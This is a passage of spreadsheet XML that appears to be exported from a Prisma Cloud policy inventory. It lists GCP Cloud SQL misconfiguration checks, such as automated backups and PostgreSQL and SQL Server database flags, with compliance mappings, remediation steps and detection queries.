      <c r="M2951" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2951" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2951" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2951" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2951" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2951" t="inlineStr">
        <is>
          <t>ISM-1246</t>
        </is>
      </c>
      <c r="S2951" t="inlineStr"/>
      <c r="T2951" t="b">
        <v>0</v>
      </c>
      <c r="U2951" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2951" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2951" t="inlineStr">
        <is>
          <t>This policy identifies the GCP SQL database instances that are not configured with automated backups. Automated backups need to be set for any instance that contains data that should be protected from loss or damage. It is recommended to have all SQL database instances set to enable automated backups.</t>
        </is>
      </c>
      <c r="X2951" t="inlineStr">
        <is>
          <t>1. Login to GCP Console
2. Navigate to 'SQL'
3. Click on the reported SQL instance
4. From the left menu go to 'Backups'
5. Go to section 'Settings', click on 'EDIT'
6. From the pop-up window 'Edit backups settings' click on 'Automated backups'
7. Provide a time window from the available dropdown
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2951" t="inlineStr"/>
      <c r="Z2951" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = settings.backupConfiguration.enabled is false and instanceType is not member of ("READ_REPLICA_INSTANCE","ON_PREMISES_INSTANCE")</t>
        </is>
      </c>
      <c r="AA2951" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2951" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2951" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-550</t>
        </is>
      </c>
      <c r="AD2951" t="b">
        <v>1</v>
      </c>
      <c r="AE2951" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2951" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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1" t="inlineStr">
        <is>
          <t>9ec88ff0-3383-4e9c-a4a7-24f5be6fb8f3</t>
        </is>
      </c>
      <c r="AI2951" t="inlineStr">
        <is>
          <t>801b9cea-6a55-4b48-b9e3-a5e0c056d834</t>
        </is>
      </c>
      <c r="AJ2951" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2951" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2952">
      <c r="A2952"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PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, ISO 27002:2022, TX-RAMP Level 1, CRI Profile v1.2.1, TX-RAMP Level 2, PCI DSS v4.0, ACSC Information Security Manual (ISM), CSA CCM v4.0.12, CIS v2.0.0 (GCP) Level 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS v1.3.0 (GCP), Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, Copy of New Zealand Information Security Manual (NZISM v3.4), PCI DSS v4.0, CIS v3.0.0 (GCP) Level 2, SOC 2, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, CIS v1.2.0 (GCP), Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2952" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2952" s="2" t="inlineStr"/>
      <c r="D2952" t="inlineStr"/>
      <c r="E2952" t="inlineStr"/>
      <c r="F2952" t="inlineStr"/>
      <c r="G2952" t="b">
        <v>0</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2952" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2952" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_error_verbosity is not set to default or stricter</t>
        </is>
      </c>
      <c r="L2952" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2952" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2952" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2952" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2952" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2952" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2952" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2952" t="inlineStr"/>
      <c r="T2952" t="b">
        <v>0</v>
      </c>
      <c r="U2952" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2952" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2952" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_error_verbosity is not set to default. The flag log_error_verbosity controls the amount of detail written in the server log for each message that is logged. Valid values are TERSE, DEFAULT, and VERBOSE. It is recommended to set log_error_verbosity to default or terse.</t>
        </is>
      </c>
      <c r="X2952" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance', click on 'ADD FLAG' in 'Flags' section, choose the flag 'log_error_verbosity' from the drop-down menu and set the value as 'default' or 'terse'
OR
If the flag has been set to other than default or terse, Under 'Customize your instance', In 'Flags' section choose the flag 'log_error_verbosity' and set the value as 'default' or 'terse'
6. Click on 'DONE' and then 'SAVE'</t>
        </is>
      </c>
      <c r="Y2952" t="inlineStr"/>
      <c r="Z2952" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "state equals RUNNABLE and databaseVersion contains POSTGRES and (settings.databaseFlags[*].name does not contain log_error_verbosity or settings.databaseFlags[?any(name contains log_error_verbosity and value contains verbose)] exists)"</t>
        </is>
      </c>
      <c r="AA2952" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2952" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2952" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-744</t>
        </is>
      </c>
      <c r="AD2952" t="b">
        <v>1</v>
      </c>
      <c r="AE2952" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2952" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>ab9eca02-0f56-4b50-8595-8dc8d5d5c925</t>
        </is>
      </c>
      <c r="AI2952" t="inlineStr">
        <is>
          <t>3014549e-9726-4b87-b30d-dbe801d4a656</t>
        </is>
      </c>
      <c r="AJ2952" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2952" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2953">
      <c r="A2953"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GDPR, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO/IEC 27001:2022, CIS v1.2.0 (GCP), ISO 27002:2022, TX-RAMP Level 1, CRI Profile v1.2.1,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SOC 2, NIST CSF v2.0, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2953" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2953" s="2" t="inlineStr"/>
      <c r="D2953" t="inlineStr"/>
      <c r="E2953" t="inlineStr"/>
      <c r="F2953" t="inlineStr"/>
      <c r="G2953" t="b">
        <v>1</v>
      </c>
      <c r="H29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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2953" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2953" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_duration is not set to on</t>
        </is>
      </c>
      <c r="L2953" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2953" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2953" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2953" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2953" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2953" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2953" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2953" t="inlineStr"/>
      <c r="T2953" t="b">
        <v>0</v>
      </c>
      <c r="U2953" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2953" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2953" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_duration is not set to on. Enabling the log_duration setting causes the duration of each completed statement to be logged. Monitoring the time taken to execute the queries can be crucial in identifying any resource-hogging queries and assessing the performance of the server. Further steps such as load balancing and the use of optimized queries can be taken to ensure the performance and stability of the server. It is recommended to set log_duration as on.</t>
        </is>
      </c>
      <c r="X2953" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance', click on 'ADD FLAG' in 'Flags' section, choose the flag 'log_duration' from the drop-down menu and set the value as 'on'
OR
If the flag has been set to other than on, Under 'Customize your instance', In 'Flags' section choose the flag 'log_duration' and set the value as 'on'
6. Click on 'DONE' and then 'SAVE' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-13
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-13</t>
        </is>
      </c>
      <c r="Y2953" t="inlineStr"/>
      <c r="Z2953" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "state equals RUNNABLE and databaseVersion contains POSTGRES and (settings.databaseFlags[*].name does not contain log_duration or settings.databaseFlags[?any(name contains log_duration and value contains off)] exists)"
{"category":"Logging","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2953" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2953" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2953" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-758-CKV2_GCP_13</t>
        </is>
      </c>
      <c r="AD2953" t="b">
        <v>1</v>
      </c>
      <c r="AE2953" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2953" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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3" t="inlineStr">
        <is>
          <t>f2f61d99-95dc-4a3c-9684-c6d7370316fc</t>
        </is>
      </c>
      <c r="AI2953" t="inlineStr">
        <is>
          <t>cfcc1ccb-7333-4667-b84c-48949d18264a</t>
        </is>
      </c>
      <c r="AJ2953" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2953" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2954">
      <c r="A2954" t="inlineStr">
        <is>
          <t>CIS v3.0.0 (GCP) Level 1, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, CIS Controls v7.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of CIS Controls v8, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, ITSG-33, ACSC Information Security Manual (ISM), PCI DSS v4.0, TX-RAMP Level 2, CIS v2.0.0 (GCP) Level 1, kfirdaus AWS Account-CS, Copy of New Zealand Information Security Manual (NZISM v3.4), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8, CIS v1.3.0 (GCP), CIS v1.2.0 (GCP), ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2954" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2954" s="2" t="inlineStr"/>
      <c r="D2954" t="inlineStr"/>
      <c r="E2954" t="inlineStr"/>
      <c r="F2954" t="inlineStr"/>
      <c r="G2954" t="b">
        <v>0</v>
      </c>
      <c r="H29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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2954" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2954" t="inlineStr">
        <is>
          <t>GCP SQL server instance database flag external scripts enabled is not set to off</t>
        </is>
      </c>
      <c r="L2954" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2954" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2954" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2954" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2954" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2954" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2954" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2954" t="inlineStr"/>
      <c r="T2954" t="b">
        <v>0</v>
      </c>
      <c r="U2954" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2954" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2954" t="inlineStr">
        <is>
          <t>This policy identifies GCP SQL server instances for which database flag 'external scripts enabled' is not set to off. Feature 'external scripts enabled' enables the execution of scripts with certain remote language extensions. When Advanced Analytics Services is installed, setup can optionally set this property to true. As the External Scripts Enabled feature allows scripts external to SQL such as files located in an R library to be executed, which could adversely affect the security of the system. It is recommended to set external scripts enabled database flag for Cloud SQL SQL Server instance to off.</t>
        </is>
      </c>
      <c r="X2954" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported SQL server instance
4. Click on EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance' section, go to 'Flags and parameters', click on 'ADD FLAG' in 'New database flag' section, choose the flag 'external scripts enabled' from the drop-down menu and set the value as 'off'
OR
If the flag has been set to other than off, Under 'Flags and parameters', choose the flag 'external scripts enabled' and set the value as 'off'
6. Click on DONE
7. Click on SAVE 
8. If 'Changes requires restart' pop-up appears, click on 'SAVE AND RESTART'</t>
        </is>
      </c>
      <c r="Y2954" t="inlineStr"/>
      <c r="Z2954" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = 'state equals RUNNABLE and databaseVersion contains SQLSERVER and (settings.databaseFlags[*].name does not contain "external scripts enabled" or settings.databaseFlags[?any(name contains "external scripts enabled" and value contains on)] exists)'</t>
        </is>
      </c>
      <c r="AA2954" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2954" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2954" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-768</t>
        </is>
      </c>
      <c r="AD2954" t="b">
        <v>1</v>
      </c>
      <c r="AE2954" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2954" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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4" t="inlineStr">
        <is>
          <t>21afee6c-ffd4-4b44-8b46-af4400d19c4b</t>
        </is>
      </c>
      <c r="AI2954" t="inlineStr">
        <is>
          <t>caafb15f-7f45-4915-983a-977187b0c7d8</t>
        </is>
      </c>
      <c r="AJ2954" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2954" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2955">
      <c r="A2955" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, CIS v1.2.0 (GCP), kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8.1, ISO 27002:2022, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), CIS v3.0.0 (GCP) Level 1, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, CIS Controls v8, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, ISO 27002:2022, Copy of CIS Controls v8, CIS v2.0.0 (GCP) Level 1, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, CIS v1.3.0 (GCP), Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2955" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2955" s="2" t="inlineStr"/>
      <c r="D2955" t="inlineStr"/>
      <c r="E2955" t="inlineStr"/>
      <c r="F2955" t="inlineStr"/>
      <c r="G2955" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2955" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2955" t="inlineStr">
        <is>
          <t>GCP SQL server instance database flag user connections is not set</t>
        </is>
      </c>
      <c r="L2955" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2955" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2955" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2955" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2955" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2955" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2955" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2955" t="inlineStr"/>
      <c r="T2955" t="b">
        <v>0</v>
      </c>
      <c r="U2955" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2955" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2955" t="inlineStr">
        <is>
          <t>This policy identifies GCP SQL server instances where the database flag 'user connections' is not set. The user connections option specifies the maximum number of simultaneous user connections (value varies in range 10-32,767) that are allowed on an instance of SQL Server. The default is 0, which means that the maximum (32,767) user connections are allowed. It is recommended to set database flag user connections for SQL Server instance according to organization-defined value.</t>
        </is>
      </c>
      <c r="X2955" t="inlineStr">
        <is>
          <t>1. Log in to the GCP console
2. Navigate SQL Instances page
3. Click on the reported SQL server instance
4. Click on EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance' section, go to 'Flags and parameters', click on 'ADD FLAG' in the 'New database flag' section, choose the flag 'user connections' from the drop-down menu, and set the value an appropriate value(10-32,767)
6. Click on DONE
7. Click on SAVE 
8. If 'Changes requires restart' pop-up appears, click on 'SAVE AND RESTART'</t>
        </is>
      </c>
      <c r="Y2955" t="inlineStr"/>
      <c r="Z2955" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = 'state equals RUNNABLE and databaseVersion contains SQLSERVER and settings.databaseFlags[*].name does not contain "user connections"'</t>
        </is>
      </c>
      <c r="AA2955" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2955" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2955" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-770</t>
        </is>
      </c>
      <c r="AD2955" t="b">
        <v>1</v>
      </c>
      <c r="AE2955" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2955" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>21b29214-06df-42f8-94f7-1cb15c65fe09</t>
        </is>
      </c>
      <c r="AI2955" t="inlineStr">
        <is>
          <t>f5b95436-0834-42b3-aa92-3f5cc077d8f9</t>
        </is>
      </c>
      <c r="AJ2955" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2955" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2956">
      <c r="A2956"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Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CIS v1.2.0 (GCP), CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO/IEC 27001:2022, ISO 27002:2022, TX-RAMP Level 1, CRI Profile v1.2.1,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SOC 2, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2956" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2956" s="2" t="inlineStr"/>
      <c r="D2956" t="inlineStr"/>
      <c r="E2956" t="inlineStr"/>
      <c r="F2956" t="inlineStr"/>
      <c r="G2956" t="b">
        <v>1</v>
      </c>
      <c r="H29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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2956" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2956" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_executor_stats is not set to off</t>
        </is>
      </c>
      <c r="L2956" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2956" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2956" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2956" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2956" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2956" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2956" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2956" t="inlineStr"/>
      <c r="T2956" t="b">
        <v>0</v>
      </c>
      <c r="U2956" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2956" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2956" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_executor_stats is not set to off. The log_executor_stats flag enables a crude profiling method for logging PostgreSQL executor performance statistics. Even though it can be useful for troubleshooting, it may increase the number of logs significantly and have performance overhead. It is recommended to set log_executor_stats off.</t>
        </is>
      </c>
      <c r="X2956" t="inlineStr">
        <is>
          <t>1. Log in to the GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance', click on 'ADD FLAG' in the 'Flags' section, choose the flag 'log_executor_stats' from the drop-down menu, and set the value as 'off'
OR
If the flag has been set to other than off, Under 'Customize your instance', In 'Flags' section choose the flag 'log_executor_stats' and set the  value as 'off'
6. Click on 'DONE' and then 'SAVE' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-14
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-14</t>
        </is>
      </c>
      <c r="Y2956" t="inlineStr"/>
      <c r="Z2956" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "state equals RUNNABLE and databaseVersion contains POSTGRES and (settings.databaseFlags[*].name does not contain log_executor_stats or settings.databaseFlags[?any(name contains log_executor_stats and value contains on)] exists)"
{"category":"Logging","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2956" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2956" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2956" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-753-CKV2_GCP_14</t>
        </is>
      </c>
      <c r="AD2956" t="b">
        <v>1</v>
      </c>
      <c r="AE2956" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2956" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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6" t="inlineStr">
        <is>
          <t>af5d8441-00f5-46db-aa34-ec90cc8a949e</t>
        </is>
      </c>
      <c r="AI2956" t="inlineStr">
        <is>
          <t>2800da7f-6c99-4432-8fe3-555614547005</t>
        </is>
      </c>
      <c r="AJ2956" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2956" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2957">
      <c r="A2957" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.6, jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, CIS Controls v7.1, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, CIS v1.2.0 (GCP), ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CIS v1.3.0 (GCP), kashan ACSC Information Security Manual (ISM), CIS Controls v8, PCI DSS v4.0, ISO/IEC 27001:2022, CIS v2.0.0 (GCP) Level 1, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, NIST SP 800-171 Revision 3, CRI Profile v1.2.1, CDC NIST 800-53 Rev4, TX-RAMP Level 2, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, 